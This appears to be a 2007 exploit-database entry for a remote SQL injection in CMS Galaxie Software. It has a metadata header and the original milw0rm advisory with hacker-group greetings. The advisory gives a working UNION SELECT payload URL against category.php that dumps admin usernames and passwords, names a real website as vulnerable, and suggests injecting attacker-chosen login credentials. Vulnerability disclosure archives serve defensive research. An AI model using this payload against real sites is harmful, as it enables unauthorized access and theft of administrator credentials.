CMS Galaxie Software - Remote SQL Injection

vendor:

CMS Galaxie Software

by:

MurderSkillz

N/A

CVSS

N/A

Remote SQL Injection

CWE

Product Name: CMS Galaxie Software

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

CMS Galaxie Software – Remote SQL Injection

The CMS Galaxie Software is vulnerable to remote SQL injection. The login page may not work, but it is possible to inject your own username and password using SQL injection. It is also possible that they are using a different table name for the login page.

Mitigation:

Unknown

Source

Exploit-DB raw data:

###############################################################################################
#         ___   ___                         _
#        / _ \ / _ \                       | |
#   __ _| | | | | | |_ __  ___   _ __   ___| |_
#  / _` | | | | | | | '_ \/ __| | '_ \ / _ \ __|
# | (_| | |_| | |_| | | | \__ \_| | | |  __/ |_
#  \__, |\___/ \___/|_| |_|___(_)_| |_|\___|\__|
#   __/ |
#  |___/
###############################################################################################
#Program Title ################################################################################
#CMS Galaxie Software  - Remote SQL Injection
#
#Note #######################################################################################
#Alright, bible.org is vuln to the sql injection.. but weird as it may seem the login doesnt work.. its a possiblility you can inject ur own username and password with sql injection, or maybe they are using another table name for the login page. good luck and give me shouts =)
# 
#Script Website ##############################################################################
#http://www.galaxie.com
#
######################################################################################
#
#Spl0it #########################################################################################
#http://vicsite.com/[pathtowebapp]/category.php?scid=1&category_id=-99%20union%20all%20select%20null,concat(username,0x20,0x3a,0x20,userpass),0%20from%20admin/*
#
#vuln discovered by ###############################################################################
#MurderSkillz
#
#shoutz: z3r0, fish, ScUzZ, clorox, SyNiCaL, pr0be, rezen, str0ke,
#err0r, sick, trintitty, asdfhacks.com , a59, fury, <S>, communized and everyone else at g00ns.net
###############################################################################################

# milw0rm.com [2007-12-13]